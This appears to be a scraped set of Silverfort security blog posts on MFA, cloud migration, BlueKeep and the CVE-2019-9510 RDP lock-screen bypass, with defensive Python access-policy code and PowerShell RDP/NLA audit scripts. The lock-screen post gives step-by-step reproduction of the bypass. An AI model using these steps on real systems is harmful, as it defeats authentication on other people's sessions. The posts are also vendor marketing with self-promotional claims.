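def evaluate(policy, req):
    """Decide at the access request, before the application's own login runs."""
    if req.device_id not in policy.managed_devices:
        return DENY, "unmanaged device"
    src = ip_address(req.source_ip)
    off_network = not any(src in ip_network(net) for net in policy.trusted_networks)
    if (off_network or req.resource in policy.sensitive_resources) and not req.mfa_verified:
        return STEP_UP, "untrusted location" if off_network else "sensitive resource"
    return ALLOW, "policy satisfied"


class AuditTrail:
    """Consolidated record of every decision, later used for the least-privilege check."""

    def __init__(self):
        self.records = []

    def evaluate_and_log(self, policy, req):
        decision, reason = evaluate(policy, req)
        self.records.append({"user": req.user, "resource": req.resource, "source_ip": req.source_ip,
                             "device": req.device_id, "decision": decision, "reason": reason})
        return decision

    def unused_rights(self, granted):
        """Rights granted in the directory that the audit trail never shows being exercised."""
        used = {(r["user"], r["resource"]) for r in self.records if r["decision"] == ALLOW}
        return {u: sorted(res for res in rights if (u, res) not in used) for u, rights in granted.items()}


# Constructed sample policy, directory grants and access requests (all hypothetical).
POLICY = AccessPolicy(trusted_networks=("10.0.0.0/8",),
                      managed_devices=frozenset({"LT-ALICE", "LT-BOB"}),
                      sensitive_resources=frozenset({"hr-db"}))
GRANTED = {"alice": {"hr-db", "wiki"}, "bob": {"wiki", "crm"}}
SAMPLE_REQUESTS = [
    AccessRequest("alice", "wiki", "10.1.2.3", "LT-ALICE"),                      # allow
    AccessRequest("alice", "hr-db", "10.1.2.3", "LT-ALICE"),                     # step-up (sensitive)
    AccessRequest("alice", "hr-db", "10.1.2.3", "LT-ALICE", mfa_verified=True),  # allow
    AccessRequest("bob", "wiki", "203.0.113.7", "LT-BOB"),                       # step-up (off network)
    AccessRequest("bob", "wiki", "10.9.9.9", "UNKNOWN-PC"),                      # deny (unmanaged)
]


def run_sample():
    """Evaluate the sample requests and report which granted rights went unused."""
    trail = AuditTrail()
    decisions = [trail.evaluate_and_log(POLICY, req) for req in SAMPLE_REQUESTS]
    return decisions, trail.unused_rights(GRANTED)
```

`run_sample()` returns the five decisions in order (allow, step-up, allow, step-up, deny) and the unused-rights report, in which bob's grants to wiki and crm show up as never exercised: his only wiki attempts were challenged or denied. The ordering of the checks matters in practice: the device check comes first so that an unmanaged machine is refused outright rather than being offered a second-factor prompt, and the step-up branch lets a request that already carries a verified factor through without re-prompting.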
Applied at authentication time, such controls make it possible to deny or allow access based on the source of the request, the user, the device used and other parameters, before the user ever logs into the system.

#### Auditing all access

If you have concerns regarding unauthorized access, it's important to keep track of every access attempt to your sensitive resources and to be able to put them in the proper context. First of all, a consolidated audit trail helps us understand which users are accessing our sensitive resources and how they are accessing them, in order to detect both internal and external threats. When looking to reduce access rights to 'least privilege', meaning limiting a user's access rights to the bare minimum permissions he or she needs to do their work, an audit trail helps us verify whether a user is actually using all of his or her access rights. In addition, understanding which other resources a user accesses can help us associate the user with a community of similar users and predict whether he or she might need access to additional resources. Or, if a user is accessing different resources than his or her peers, the audit trail helps us identify this anomaly, which may warrant further investigation.

#### Unified security policies

Migrating homegrown and legacy systems to the cloud is typically a long process and may take years. This is why it is often done in phases, and involves applications that run in hybrid environments. Many organizations already have some hybrid environments, and Gartner estimates that by 2020, 90% of organizations will adopt hybrid infrastructure management. Managing security policies across hybrid environments in a unified manner not only simplifies these processes but also ensures improved and consistent protection.

### How can Silverfort help?

Silverfort's next-generation authentication platform was designed to meet the needs of our modern networks.
Unlike mainstream MFA solutions, it doesn't require deployment of software agents or proxies, or any integration with the protected systems. This makes it uniquely suitable for securing homegrown and legacy applications, whether they run on-premises or are being migrated to the cloud. Before migrating the application, Silverfort automatically maps out its dependencies, a critical step in ensuring a smooth migration without 'breaking' the application. Then it can seamlessly add MFA to the system and ensure secure access, without requiring any changes to the application, its supporting infrastructure or the network. Silverfort continuously monitors and audits all access requests across on-premises, cloud and hybrid environments. The consolidated audit trail details both user-to-machine and machine-to-machine access activity and is further analyzed by Silverfort's AI-driven risk engine to automatically identify behavioral anomalies and known malicious access patterns, such as brute force attacks, ransomware, lateral movement attacks (e.g. pass-the-hash) and more. Finally, Silverfort enables you to manage MFA and access policies across all your enterprise environments from a unified console, simplifying implementation and reducing ongoing maintenance costs.

By Dana Tamir, VP Market Strategy, Silverfort

Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications.

To learn more about Silverfort and see a demo, contact us today!
--- - Published: 2019-06-26 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations-2/ With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is no doubt that the introduction of trends like cloud, IoT and BYOD are changing our networks, dissolving the perimeters we used to have. In this reality, ensuring the security of enterprise systems that are migrated to the cloud can be a challenge and in some cases, put on hold the migration of homegrown and legacy systems. When planning to migrate a homegrown or legacy application to the cloud, many organizations choose the ‘lift and shift’ approach. The advantages of the ‘Lift-and-Shift’ approach are clear because it means that the application and its associated data are migrated to the cloud with minimal or no changes. You “lifted” the application from its existing environments and “shifted” it as-is to the cloud. This means that there won’t be any significant changes to the application architecture, data flow, or authentication mechanisms. Securing Access to Migrated Applications Many have concerns regarding the security of migrated applications in the cloud. Some of these concerns are justified: In a 2018 Cloud Security Report from Crowd Research Partners, 84% said their traditional security solutions either don’t work at all in cloud environments or will have only limited functionality. 43% of cybersecurity professionals said they struggle with visibility into cloud infrastructure security, 38% struggled with compliance, and 35% struggled to apply consistent security policies across cloud and on-premises environments. 55% said that their biggest perceived threats to cloud security were unauthorized access through misuse of employee credentials and improper access controls. These concerns are justified when our homegrown and legacy applications rely on password-only authentication. 
While running in on-premises data centers, traditional defense layers provided additional protection. If the same security controls aren’t available when running these systems in the cloud, they become inherently more vulnerable. In some cases, adjustments to traditional security controls can be made to the system with some code changes. In other cases, such changes are impractical. 5 things that can help with a smooth and secure migration of on-premises servers and applications to the cloud Here are five things to keep in mind when planning a migration of on-premises homegrown and legacy systems to the cloud: Mapping dependencies before moving the app to the cloud Successful application migration requires a detailed understanding of how all of your applications and servers are communicating. To map dependencies, you first need to discover how all machines and applications in your infrastructure are communicating with each other, including any Shadow IT, e. g. servers and systems implemented by various business units, that your IT is not aware of. If your applications have any dependencies on Shadow IT, it must be incorporated into your migration plan. Without mapping all dependencies first, your applications are likely to break. Securing authentication to migrated applications Securing access to enterprise systems is a top priority whether an application is running on-premises or in the cloud. After all, it doesn’t really matter where the application is running - if it relies of password authentication it can be exposed to unauthorized access. And if you obtain an administrator password, which enables full access and control over the application and its infrastructure, you can steal data or make whatever changes you want. The only difference is that when an application is running in the cloud, it may not be protected by the traditional security defense layers that would defend applications on premises. 
However, there are cloud security defenses that can be applied. Adding multi-factor authentication for any migrated application, especially those that rely on password-only authentication mechanisms, provides a critical security control and ensures that only authorized users can log into the application. (There is a caveat: if you are doing a ‘shift-and-lift’ migration of a homegrown or legacy system, it would probably be a challenge to apply mainstream MFA solutions. A next-generation authentication solution will better support these apps. ) Adding access policies (deny or grant access): Most applications apply role-based access controls on users after they logged into the application. However, in some cases, these may not be enough. For example, you may want a policy that says that a user may not log into the application from an unauthorized device, or from an untrusted location. In that case, access controls should be applied at the access request level. By applying secure authentication it is possible to apply effective access control to deny or allow access based on the source of the request, the user, the device used and other parameters before the user logs into the system. Auditing all access: If you have concerns regarding unauthorized access, it’s important to keep track of any access attempts to your sensitive resources and to have the ability to put them in the proper context. First of all, a consolidated audit trail can help us understand which users are accessing our sensitive resources and how they are accessing them, to detect both internal and external threats. When looking to minimize access rights to ‘least privileges’, meaning limiting a user’s access rights to the bare minimum permissions he/she needs to perform their work, an audit trail helps us verify if a user is currently using or not using all his/her access rights. 
In addition, understanding what other resources a user is accessing can help us associate the user with a community of similar users, and predict whether he/she might need to access additional resources. Or, if the user is accessing different resources than his peers, an audit trail can help us identify this anomaly, which may require further investigation.

#### Unified security policies

Migrating homegrown and legacy systems to the cloud is typically a long process and may take years. This is why it’s often done in a phased approach, and involves applications that run in hybrid environments. Many organizations already have some hybrid environments, and Gartner estimates that by 2020, 90% of organizations will adopt hybrid infrastructure management. Managing security policies across hybrid environments in a unified manner not only simplifies these processes but also ensures improved and consistent protection.

### How can Silverfort help?

Silverfort’s next-generation authentication platform was designed to meet the needs of our modern networks. Unlike mainstream MFA solutions, it doesn’t require deployment of software agents or proxies, or any integration with the protected systems. This makes it uniquely suitable for securing homegrown and legacy applications, whether they are running on-premises or while migrating them to the cloud. Before migrating the application, Silverfort automatically maps out dependencies, a critical step in ensuring a smooth migration without ‘breaking’ the application. Then it can seamlessly add MFA to the system and ensure secure access, without requiring any changes to it, its supporting infrastructure or network. Silverfort continuously monitors and audits all access requests across on-premises, cloud, and hybrid environments.
The consolidated audit trail details both user-to-machine and machine-to-machine access activities and is further analyzed by Silverfort’s AI-driven risk engine to automatically identify behavior anomalies and known malicious access patterns, like brute force attacks, ransomware, lateral movement attacks (e.g. pass-the-hash) and more. Finally, Silverfort enables you to manage MFA and access policies across all your enterprise environments from a unified console, simplifying the implementation and reducing ongoing maintenance costs.

By Dana Tamir, VP Market Strategy, Silverfort

Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications.

To learn more about Silverfort and see a demo, contact us today!

---
- Published: 2019-06-13
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability/

Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that effectively allows bypassing Multi-Factor Authentication (MFA) to Windows servers. Microsoft was quick to dismiss the vulnerability. But however you look at it, with most MFA solutions, locked remote desktops can be unlocked due to this vulnerability without using MFA, even if MFA is enforced on the server. CERT said that there is no practical solution to the problem and recommended a few workarounds. In this post, we show how Silverfort can be used to overcome this vulnerability.
### The Vulnerability Explained

The vulnerability is a result of a new behaviour of the RDP reconnection feature in Windows 10 1803 and Windows Server 2019. If Network Level Authentication (NLA) is enforced, the following sequence of events triggers the vulnerability:

A similar sequence of events will lead to the vulnerability even if NLA is not enforced. The issue with these flows is that the user locked the remote desktop, but the attacker re-opened it without the user entering the password, based only on the Kerberos ticket. This flow remains the same even if an MFA solution is implemented for desktop logon. One would expect the remote desktop to require the user to re-enter their password and provide the second authentication factor to unlock the remote desktop. But this is not the case with the new RDP reconnection behaviour.

The vulnerability has two main effects:

- The user reconnects to the server without re-entering the password.
- If an MFA solution protects Windows logon, rather than the underlying protocols Kerberos and NTLM, the user is not required to perform MFA to unlock the computer. This affects most MFA solutions.

### Easy to Reproduce

To witness the vulnerability with your own eyes, try the following steps:

1. Remote desktop to a Windows 10 1803 machine.
2. Lock the remote desktop.
3. Disconnect the client device from the network.
4. Reconnect the client device.
5. You are back in the remote desktop session without re-entering your password.

### Why Silverfort is Unaffected

Consider a remote desktop protected by Silverfort. Silverfort can protect any Kerberos service running on the remote desktop, including terminal services (termsrv). A policy in Silverfort can be set to require MFA every time a termsrv ticket is requested for the remote desktop. Now let’s reconsider the sequence of events that led to the vulnerability, but this time with Silverfort:

By requiring step-up authentication for the Kerberos ticket request, in addition to the desktop logon, Silverfort is able to block the attack.
### Moral of the Story

This vulnerability shows that it’s not enough to have MFA for one interface of a system. All access points to a system should be protected with MFA to protect it from compromise.

### Further reading

- Vulnerability Note VU#576688
- Microsoft’s description of the RDP reconnection feature
- Microsoft’s response

Yaron Kassner, CTO and Co-Founder, Silverfort

Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain, and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

---
- Published: 2019-06-13
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability-2/
---
- Published: 2019-06-05
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure/

By Yaron Kassner, CTO and Co-Founder, Silverfort

On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep vulnerability, which is also known as CVE-2019-0708. The patch fixes a critical Remote Code Execution vulnerability. According to Microsoft: “This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

[Figure 1: Microsoft TechNet announcement about the patch fixing CVE-2019-0708]

Microsoft was quick to release the patch and is putting major efforts into making sure their customers patch their systems.
The severity of this vulnerability drove Microsoft to take the unusual step of issuing patches not only for currently affected systems like Windows 10, Windows 7, Windows Server 2016, and Windows Server 2008 R2, but also for systems that are no longer supported, like Windows 2003, Windows XP, and Windows Vista. Microsoft security officials say they are confident BlueKeep exploits already exist and may have the potential to trigger self-replicating attacks as destructive as the 2017 WannaCry attack that shut down computers all over the world.

The BlueKeep vulnerability should be taken very seriously. It can be exploited to achieve an initial foothold in a network by attacking internet-exposed remote desktop servers, and it can also be used by attackers to move laterally in the network after obtaining this initial foothold. While applying this patch is of paramount importance, patching all servers in an organization can be a very difficult task for enterprises. It’s important to remember that even a single unpatched endpoint can enable a breach. Evidently, the EternalBlue vulnerability was exploited on a massive scale well after the patch was released by Microsoft. Partial exploits have already been released for the BlueKeep vulnerability, so it is just a matter of time before the vulnerability is widely used by attackers.

### Protecting Your Systems from the BlueKeep vulnerability

The first thing you should do is identify any unpatched or old operating systems in your network and patch all affected systems – this should be done as soon as possible!

Next, you should use Network Level Authentication (NLA) where possible: NLA requires authentication before the vulnerability can be triggered. Microsoft strongly recommends this, yet it isn’t the default setting.

[Figure 2: Enabling NLA to require authentication before the vulnerability can be triggered]

Enabling NLA prevents pre-authentication execution.
However, it’s important to remember that affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate.

### Preventing Exploitation of Compromised Credentials for Remote Code Execution with Silverfort

As mentioned above, enabling NLA is critical for preventing pre-authentication execution, but it’s not enough, because if an attacker already has valid credentials (which are quite easy to get these days), the attacker can still gain access and exploit the RCE vulnerability. This is where Silverfort comes in and prevents the use of compromised credentials for RCE exploitation and other remote desktop protocol attacks: Silverfort’s agentless, proxyless authentication platform can enforce multi-factor authentication (MFA) and strong authentication policies to prevent unauthorized access to any system, no matter what it is or where it is – whether on-premises or in the cloud. This includes systems that couldn’t be protected by MFA solutions until today, like IT infrastructure, homegrown and legacy applications, file shares, databases, and more.

When an attacker tries to exploit compromised credentials to gain access to a system, Silverfort can require a second authentication factor to validate the user’s identity. While legitimate users can easily authenticate, an attacker will fail the 2nd authentication factor and therefore his/her access will be denied. Silverfort can apply static MFA policies that require users to authenticate with a 2nd factor any time they access systems, but that can be quite disruptive. Therefore, risk-based adaptive policies are highly recommended: adaptive policies can be set to require a 2nd authentication factor only when risk levels are high – this helps minimize disruptions without compromising security. To read more about Silverfort’s adaptive policies and AI-based Risk Engine, download this free whitepaper.
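Both the reproduction steps in the lock-screen post above and the patch-plus-NLA advice in this post come down to a few Remote Desktop settings on each host. The following PowerShell is an added example, not code from either post or from Silverfort: it reports the OS build, whether RDP is enabled and listening on 3389, whether NLA and TLS are required, and whether the patch IDs you pass are installed, and with `-EnforceNla` it switches NLA on. The `$PatchKb` default is a placeholder (neither post lists KB numbers), and the build-number threshold assumes that builds after Windows 10 1803 keep the reconnection behaviour the post describes.

```powershell
# Added example (not code from the posts above or from Silverfort): audit the
# Remote Desktop settings those posts discuss and optionally require NLA.
# Run in an elevated PowerShell session on the host being checked.
param(
    # Patch IDs to verify. Placeholder value: fill it from the Microsoft advisory
    # for CVE-2019-0708 for this host's OS.
    [string[]]$PatchKb = @('KB0000000'),
    # When set, switch on Network Level Authentication for the RDP-Tcp listener.
    [switch]$EnforceNla
)

$os    = Get-CimInstance -ClassName Win32_OperatingSystem
$build = [int]$os.BuildNumber

# Build 17134 is Windows 10 1803 and 17763 is Windows Server 2019, the two releases
# the lock-screen post names for the new RDP reconnection behaviour. Treating every
# later build as having it too is an assumption, not something the post states.
$hasReconnectBehaviour = $build -ge 17134

# Listener settings: WMI exposes the same values that the System Properties dialog
# and the registry hold; reading both catches a half-applied change.
$ts  = Get-CimInstance -Namespace 'root\cimv2\TerminalServices' `
        -ClassName Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'"
$reg = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

$rdpEnabled  = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 0
$nlaRequired = ($ts.UserAuthenticationRequired -eq 1) -and ($reg.UserAuthentication -eq 1)
$tlsRequired = $ts.SecurityLayer -eq 2     # 0 = RDP security layer, 1 = negotiate, 2 = TLS

# A listener on 3389 is the exposure BlueKeep needs. Get-NetTCPConnection does not
# exist on the oldest affected releases, so report "unknown" there instead of failing.
$listening = 'unknown'
if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
    $listening = [bool](Get-NetTCPConnection -State Listen -LocalPort 3389 -ErrorAction SilentlyContinue)
}

# Any requested KB that Get-HotFix cannot find is reported as missing.
$missing = foreach ($kb in $PatchKb) {
    if (-not (Get-HotFix -Id $kb -ErrorAction SilentlyContinue)) { $kb }
}

[pscustomobject]@{
    Host               = $env:COMPUTERNAME
    OS                 = $os.Caption
    Build              = $build
    RdpEnabled         = $rdpEnabled
    ListeningOn3389    = $listening
    NlaRequired        = $nlaRequired
    TlsRequired        = $tlsRequired
    MissingPatches     = ($missing -join ', ')
    ReconnectBehaviour = $hasReconnectBehaviour
} | Format-List

if ($EnforceNla -and -not $nlaRequired) {
    # Same setting as the Group Policy "Require user authentication for remote
    # connections by using Network Level Authentication".
    Invoke-CimMethod -InputObject $ts -MethodName SetUserAuthenticationRequired `
        -Arguments @{ UserAuthenticationRequired = 1 } | Out-Null
    Write-Output "NLA is now required for RDP-Tcp on $env:COMPUTERNAME."
}
```

Run it on each host (for example through Invoke-Command) to build the inventory of unpatched or NLA-less RDP servers the post asks you to identify first.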
[Figure 3: Silverfort can apply static MFA policies or risk-based adaptive authentication policies]

### Stopping Lateral Movement with Zero-Trust Security Policies

Silverfort can enforce MFA and secure access not only for external access, but also inside corporate networks. This includes both user-to-machine access and machine-to-machine access (service accounts). Service accounts are used by various corporate systems to communicate with other systems and automate processes. Such accounts are a prime target for attackers, since they are often equipped with high privileges and their passwords are rarely changed. But because these accounts are used by machines rather than humans, they cannot be protected with regular multi-factor authentication methods. Silverfort introduces a unique capability for securing the use of service accounts, which prevents unauthorized entities from stealing or misusing them. This is achieved without any change to the relevant systems.

Silverfort enables organizations to implement a holistic zero-trust security model without deploying software agents or proxies, and without requiring changes to existing networks. Its innovative architecture ensures secure access to any system, no matter where it is, or what it is. This includes user-to-machine and machine-to-machine access, as well as any administrative access. Because Silverfort avoids any modifications to existing assets and infrastructure, it allows not only small agile companies but also large traditional enterprises to achieve zero trust security throughout their networks.

Yaron Kassner, CTO and Co-Founder, Silverfort

Want to learn more or see a demo? Contact us today!

---
- Published: 2019-05-29
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor/

By Dana Tamir, VP Market Strategy, Silverfort

Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management (IAM). Needless to say, we are thrilled and very honored to receive such recognition. Gartner’s report explains that “Digital businesses must achieve a great user experience, and support digital transformation and optimization as well as the shift of workloads to the cloud.” We completely agree. Corporate networks have been going through dramatic changes in recent years, due to IT revolutions such as the cloud, Internet of Things (IoT), Bring Your Own Device (BYOD) and more. In this new reality, with countless devices and services that are all connected to each other without clear perimeters, traditional authentication solutions become irrelevant, and a new approach is needed.

### What’s So Cool About Silverfort?

We attribute Silverfort’s rise as a Next-Generation Authentication vendor to the following factors:

#### It’s agentless

Yes, that’s true! Silverfort can enforce secure access to any system, no matter where it is or what it is, without installing software agents on it and without requiring code changes. This means that it’s not only simple to deploy, but it also automatically protects new assets or shadow IT systems without having to integrate with them one by one.
#### It doesn’t require proxies and doesn’t need to decrypt network traffic

Silverfort is not deployed as a proxy between the users and the applications or resources they are accessing. That’s because proxies assume there is some perimeter where they can monitor user access. In today’s enterprises, with so many connected users, devices and systems, on-premises and in the cloud, perimeters dissolve and deploying proxies becomes impossible. We believe that this is a major barrier: where will you deploy a proxy to capture all user-to-machine and machine-to-machine interactions across the different environments, and within each environment? Silverfort’s innovative architecture removes the need to answer this difficult question. To do that, we had to overcome another challenge that was thought to be impossible – analyzing encrypted authentication protocols without decrypting the traffic.

#### It can secure authentication and access to any sensitive system, including those considered ‘unprotectable’ until today

By eliminating the need for agents, proxies or code changes, Silverfort can enable secure authentication (including MFA and adaptive authentication) for any system. This includes systems that could not be protected until today, like homegrown and legacy applications, critical IT infrastructure (hypervisors, DCs), IoT devices, SCADA servers, healthcare systems like PACS and EHR, dynamic IaaS environments, PCI servers, databases, file shares and more.

#### It enables enterprises to achieve Zero Trust security without rebuilding their networks

As traditional network perimeters dissolve, identity and access management is becoming the new perimeter. More and more organizations look to Zero Trust as a solution, because they can no longer assume internal users are trusted. However, implementing a Zero Trust architecture usually requires companies to rebuild their network.
Silverfort’s agentless and proxyless architecture is the first to enable identity-based Zero Trust security without this need, making it simple and achievable for any enterprise.

#### It leverages an AI-Driven Risk Engine to continuously analyze risk and trust

Due to the holistic nature of Silverfort’s architecture, it continuously monitors all the access activities of all users and systems, analyzing 20x-50x more access activity than any other authentication solution. To continuously analyze all access activity, as well as external threat indicators provided by other security solutions, Silverfort leverages a first-of-its-kind AI-Driven Risk Engine. Silverfort’s Risk Engine continuously profiles and analyzes user behaviors using machine learning and reinforcement learning to apply the most accurate MFA and access policies.

#### It can detect and block threats in real time

Silverfort’s AI-Driven Risk Engine can detect a wide range of threats in real time, including behavior anomalies as well as known malicious patterns like brute-force attacks, lateral movement (e.g. Pass the Hash), ransomware and more. Using adaptive policies, it can block access or require users to authenticate with a 2nd factor before allowing them to continue with high-risk access. Silverfort step-up authentication can also be triggered by external threat indicators sent by other security products (including Palo Alto Networks, Check Point, Microsoft and others). So, if your firewall detected a suspicious user or device, Silverfort can now step up the authentication for any attempt to access any system, even when coming from inside the perimeter.

#### It lets organizations maximize security while minimizing disruptions

Today, organizations are struggling to deal with the high number of false-positive alerts. Blocking users because of false-positive alerts is very disruptive and puts a lot of pressure on the SOC and helpdesk, but at the same time it’s crucial to block actual threats.
Silverfort enables organizations to step up the authentication requirements in response to real-time threats and allow access only to verified users. This dramatically reduces overhead for the SOC and helpdesk. So, the result is better response with fewer disruptions to your users and business.

We can continue listing more benefits and advantages, but why don’t you see for yourself? Contact us today to schedule a demo - we would love to show you more.

Dana Tamir, VP Market Strategy, Silverfort

To learn more about Silverfort and see a demo, contact us today!

---
- Published: 2019-05-29
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor-2/
---
- Published: 2019-05-05
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure-2/

By Yaron Kassner, CTO and Co-Founder, Silverfort
It’s important to remember that even a single unpatched endpoint can enable a breach. Evidently, the EternalBlue vulnerability was exploited on a massive scale well after the patch was released by Microsoft. Partial exploits have already been released for the BlueKeep vulnerability, so it is just a matter of time before the vulnerability is widely used by attackers. Protecting Your Systems from the BlueKeep vulnerability: The first thing you should do is identify any unpatched or old operating systems in your network and patch all affected systems – this should be done as soon as possible! Next, you should use Network Level Authentication (NLA) where possible: NLA requires authentication before the vulnerability can be triggered. Microsoft strongly recommends this, yet it isn’t the default setting. 2 Enabling NLA to require authentication before the vulnerability can be triggered Enabling NLA prevents pre-authentication execution. However, it’s important to remember that affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. Preventing Exploitation of Compromised Credentials for Remote Code Execution with Silverfort As mentioned above, enabling NLA is critical for preventing the pre-authentication execution, but it’s not enough because if an attacker already has valid credentials (which are quite easy to get these days), the attacker and still gain access and exploit the RCE vulnerability. This is where Silverfort comes in and prevents the use of compromised credentials for RCE exploitation and other remote desktop protocol attacks:Silverfort’s agentless, proxyless authentication platform can enforce multi-factor authentication (MFA) and strong authentication policies to prevent unauthorized access to any system, no matter what it is or where it is – whether on-premises or in the cloud. 
This includes systems that couldn’t be protected by MFA solutions until today, like IT infrastructure, homegrown and legacy applications, file shares, databases, and more. When an attacker tries to exploit compromised credentials to gain access to a system, Silverfort can require a second authentication factor to validate the user’s identity. While legitimate users can easily authenticate, an attacker will fail the 2nd authentication factor and therefore his/her access will be denied. Silverfort can apply static MFA policies that require users to authenticate with a 2nd factor any time they access systems, but that can be quite disruptive. Therefore, risk-based adaptive policies are highly recommended: Adaptive policies can be set to require a 2nd authentication factor only when risk levels are high – this helps minimize disruptions without compromising security. To read more about Silverfort’s adaptive policies and AI-based Risk Engine download this free whitepaper. 3 Silverfort can apply static MFA policies or risk-based adaptive authentication policies Stopping Lateral Movement with Zero-Trust Security Policies Silverfort can enforce MFA and secure access not only for external access, but also inside corporate networks. This includes both user-to-machine access and machine-to-machine access (service accounts). Service accounts are used by various corporate systems to communicate with other systems and automate processes. Such accounts are a prime target for attackers, since they are often equipped with high privileges and their passwords are rarely changed. But because these accounts are used by machines, rather than humans, they cannot be protected with regular multi-factor authentication methods. Silverfort introduces a unique capability for securing the use of service accounts, which prevents unauthorized entities from stealing or misusing them. This is achieved without any change to the relevant systems. 
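For the two host-side steps above (patch, then require NLA), here is an added PowerShell audit script; it is example code written for this page, not Silverfort’s or Microsoft’s. It assumes the RSAT ActiveDirectory module, WinRM/CIM access to the hosts, and that you replace the placeholder in `$PatchKbIds` with the KB numbers from Microsoft’s advisory for the OS versions in scope.

```powershell
<#
  Added example, not Silverfort's or Microsoft's code. It checks the two host-side
  mitigations for CVE-2019-0708 (the patch and Network Level Authentication) on each
  RDP listener and reports hosts that still expose the pre-authentication path.
  Assumptions: RSAT ActiveDirectory module and WinRM/CIM access to the hosts;
  $PatchKbIds is a PLACEHOLDER to be filled from Microsoft's advisory per OS version.
#>
[CmdletBinding()]
param(
    # Hosts to audit; defaults to every Windows computer object in the domain.
    [string[]]$ComputerName,
    # KB identifiers of the CVE-2019-0708 updates for the OS versions in scope.
    # PLACEHOLDER: only hosts whose OS the advisory lists as affected need one of these.
    [string[]]$PatchKbIds = @('KB_PLACEHOLDER_CVE_2019_0708'),
    # Report-only by default; -EnforceNla switches NLA on where it is off.
    [switch]$EnforceNla
)

if (-not $ComputerName) {
    Import-Module ActiveDirectory -ErrorAction Stop
    $ComputerName = Get-ADComputer -Filter 'OperatingSystem -like "*Windows*"' |
        Select-Object -ExpandProperty Name
}

function Get-RdpPosture {
    param([string]$Computer, [string[]]$KbIds)

    $result = [ordered]@{
        Computer   = $Computer
        OS         = $null
        RdpEnabled = $null   # AllowTSConnections == 1: the listener accepts connections
        NlaEnabled = $null   # UserAuthenticationRequired == 1: NLA is on for RDP-Tcp
        Patched    = $null   # at least one of the given KB IDs is installed
        Error      = $null
    }
    try {
        $os = Get-CimInstance -ComputerName $Computer -ClassName Win32_OperatingSystem -ErrorAction Stop
        $result.OS = $os.Caption

        $tss = Get-CimInstance -ComputerName $Computer -Namespace 'root\cimv2\TerminalServices' `
                -ClassName Win32_TerminalServiceSetting -ErrorAction Stop
        $result.RdpEnabled = ($tss.AllowTSConnections -eq 1)

        $tsg = Get-CimInstance -ComputerName $Computer -Namespace 'root\cimv2\TerminalServices' `
                -ClassName Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'" -ErrorAction Stop
        $result.NlaEnabled = ($tsg.UserAuthenticationRequired -eq 1)

        # Get-HotFix returns nothing when none of the IDs is present on the host.
        $hotfix = Get-HotFix -ComputerName $Computer -Id $KbIds -ErrorAction SilentlyContinue
        $result.Patched = [bool]$hotfix
    }
    catch {
        $result.Error = $_.Exception.Message
    }
    [pscustomobject]$result
}

function Enable-RdpNla {
    # Turns NLA on for the RDP-Tcp listener through the documented WMI method.
    param([string]$Computer)
    $tsg = Get-CimInstance -ComputerName $Computer -Namespace 'root\cimv2\TerminalServices' `
            -ClassName Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'" -ErrorAction Stop
    Invoke-CimMethod -InputObject $tsg -MethodName SetUserAuthenticationRequired `
        -Arguments @{ UserAuthenticationRequired = 1 } | Out-Null
}

$report = foreach ($c in $ComputerName) { Get-RdpPosture -Computer $c -KbIds $PatchKbIds }

# Hosts that accept RDP, lack the patch, and do not require authentication before the
# session is set up are the ones still reachable by the pre-authentication path.
# Filter on OS before acting: the KB check is meaningful only for affected versions.
$exposed = $report | Where-Object { $_.RdpEnabled -and -not $_.Patched -and -not $_.NlaEnabled }

if ($EnforceNla) {
    foreach ($h in $exposed) {
        try { Enable-RdpNla -Computer $h.Computer; $h.NlaEnabled = $true }
        catch { $h.Error = "NLA enforcement failed: $($_.Exception.Message)" }
    }
}

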